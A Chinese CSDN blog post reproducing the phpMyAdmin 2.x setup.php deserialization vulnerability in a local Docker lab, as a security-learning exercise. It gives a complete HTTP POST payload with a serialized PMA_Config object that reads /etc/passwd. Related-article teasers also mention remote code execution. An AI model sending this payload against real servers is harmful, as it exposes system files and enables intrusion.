WooYun-2016-199433 phpmyadmin 反序列化漏洞

最新推荐文章于 2024-06-09 23:00:35 发布
最新推荐文章于 2024-06-09 23:00:35 发布
阅读量373 收藏
点赞数
分类专栏: 漏洞 文章标签: 安全 web安全 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51387754/article/details/121783585
版权
这篇博客介绍了phpmyadmin 2.x版本的一个严重安全问题——反序列化漏洞。攻击者能利用此漏洞读取任意文件甚至执行代码。文章详细阐述了漏洞的基本情况,并通过复现过程展示了如何触发该漏洞。
摘要由CSDN通过智能技术生成

漏洞简介

phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。

漏洞复现

执行如下命令启动phpmyadmin:

docker-compose up -d

环境启动后,访问http://your-ip:8080,即可看到phpmyadmin的首页。因为没有连接数据库,所以此时会报错,但我们这个漏洞的利用与数据库无关,所以忽略。

在这里插入图片描述
在这里插入图片描述

发送如下数据包,即可读取/etc/passwd

POST /scripts/setup.php HTTP/1.1
Host: 127.0.0.1:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

在这里插入图片描述

GuiltyFet
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Phpmyadmin 2.X 反序列化漏洞WooYun-2016-199433
jammny
11-28 1228
一、漏洞简介 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 二、漏洞影响 phpmyadmin 2.x 三、漏洞分析 https://rj45mp.github.io/phpMyAdmin-WooYun-2016-199433/ 四、漏洞利用 访问漏洞存在页面,并用bp进行抓包 更改请求为post并添加如下payload后发送,即可读取/etc/passwd: action=jammny&configurati.
WooYun-2016-199433 phpmyadmin反序列化漏洞复现
凝聚力安全团队
01-25 988
目录漏洞描述影响版本漏洞环境搭建漏洞分析漏洞检测漏洞利用漏洞加固 漏洞描述    影响版本 phpMyAdmin 2.x版本 漏洞环境搭建 漏洞分析 漏洞检测 漏洞利用 漏洞加固
WooYun-2016-199433 -phpmyadmin-反序列化RCE-getshell
最新发布
qq_29060627的博客
06-09 339
靶场环境存在 /usr/local/lib/php/pearcmd.php,并且开启了register_argc_argv选项。包含一下/tmp/99;
[Vulhub](WooYun-2016-199433phpmyadmin反序列化漏洞
weixin_45605352的博客
04-25 823
0x01 预备知识 什么是序列化 序列化 (serialize)是将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。以后,可以通过从存储区中读取或反序列化对象的状态,重新创建该对象。【将状态信息保存为字符串】 简单的理解:将PHP中 对象、类、数组、变量、匿名函数等,转化为字符串,方便保存到数据库或者文件中 当在php中创建了一个对象后,可以通过serialize()把这个对象转变成一个字符串,保存对象的值方便之后的传递与使用。 什么是反序列化
Vulhub靶场-phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433
Grace_for_it的博客
05-03 540
vulhub靶场复现 php源码 bp抓包 网络安全 渗透测试
漏洞复现-Phpmyadmin setup.php反序列化漏洞WooYun-2016-199433
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-04 3745
phpMyAdmin的Setup脚本用于生成配置。如果远程攻击者向该脚本提交了特制的POST请求的话,就可能在生成的config.inc.php配置文件中包含任意PHP代码,未经认证的远程攻击者可以利用这个漏洞执行任意PHP代码。
phpmyadmin scriptssetup.php 反序列化漏洞WooYun-2016-199433
黑白的博客
12-29 463
声明 好好学习,天天向上 漏洞描述 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码。 影响范围 2.x 复现过程 这里使用2.8.0.4版本 使用vulhub /app/vulhub-master/phpmyadmin/WooYun-2016-199433 使用docker启动 docker-compose build docker-compose up -d 环境启动后,访问 http://192.168.239.129:8080 抓包,修改
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433)(Kali)
Szero
05-01 494
phpmyadmin scripts/setup.php 反序列化漏洞WooYun-2016-199433)(Kali)
Phpmyadmin Scripts / setup.php反序列化漏洞 WooYun-2016-199433 漏洞复现
ADummy的博客
02-27 439
Phpmyadmin Scripts / setup.php反序列化漏洞WooYun-2016-199433) by ADummy 0x00利用路线 ​ Burpsuite抓包改包—>有回显读取文件 0x01漏洞介绍 phpmyadmin 2.x版本中存在一处反序列化漏洞,通过该漏洞,攻击者可以读取任意文件或执行任意代码 影响版本 phpmyadmin 2.x 0x02漏洞复现 payload POST /scripts/setup.php HTTP/1.1 Host: your-ip:808
python爬虫案例wooyun-public-master.zip
05-31
在"python爬虫案例wooyun-public-master.zip"中,我们可以深入探讨Python爬虫技术的相关知识点,包括基础概念、常用库、网络请求、HTML解析、数据存储等方面。 1. **基础概念** - **爬虫**: 一种自动浏览并提取...
wooyun-public-master-python.rar
01-23
wooyun_public-master-python.rar Python爬虫入门需要掌握Python基础语法、网络请求和数据抓取、解析HTML和XML、处理HTTP响应、数据存储、使用代理和反爬策略、并发和多线程等技术,并遵守相关法律和道德规范。
py爬虫wooyun-public-master
04-20
py爬虫wooyun_public-master提取方式是百度网盘分享地址
wooyun_public-master.zip
08-23
标题中的"wooyun_public-master.zip"表明这是一个与Wooyun相关的开源项目,而Wooyun,也称为“乌云”,曾是中国知名的网络安全社区。这个压缩包可能是该社区公开的一部分资源或者研究资料,以"master"命名,通常代表...
wooyun_public-master-python.rar
02-03
从标题来看,我们可以推测这可能是一个关于网络安全漏洞挖掘的项目,因为“wooyun”(乌云)曾是一个知名的中国网络安全社区。这个项目可能包含了在Python语言环境下编写的安全检测或漏洞分析的代码。 【描述】...
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 8451
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞漏洞复现 fofa语法
各个漏洞文库
weixin_51387754的博客
06-19 6801
漏洞文档总结: 佩奇文库 Qingy 风炫漏洞库 白阁文库 Morker文库 狼组知识库 零组文库 PwnWiki
Log4j2 RCE漏洞及靶场搭建
weixin_51387754的博客
12-11 6155
漏洞简介 Apache Log4j2是一款Java日志框架,是Log4j 的升级版。可以控制每一条日志的输出格式。通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该漏洞是由于Apache Log4j2某些功能存在递归解析功能,攻击者可利用该漏洞在未授权的情况下,构造恶意数据进行远程代码执行攻击,最终获取服务器最高权限。 目前受影响的Apache Log4j2版本: 2.0 ≤ Apache Log4j <= 2.14.1 漏洞复现 在下载镜像复现之前确保,虚拟机非处于挂起状态! 在下载
wooyun-2010-09336
01-14
wooyun-2010-09336是2010年发生的一起网络安全漏洞事件。这个漏洞是由于某个网站的后台管理系统存在缺陷,使得攻击者可以绕过身份验证,远程执行恶意代码,从而获取系统的控制权。 当时,一位白帽黑客通过对该网站...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

GuiltyFet

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值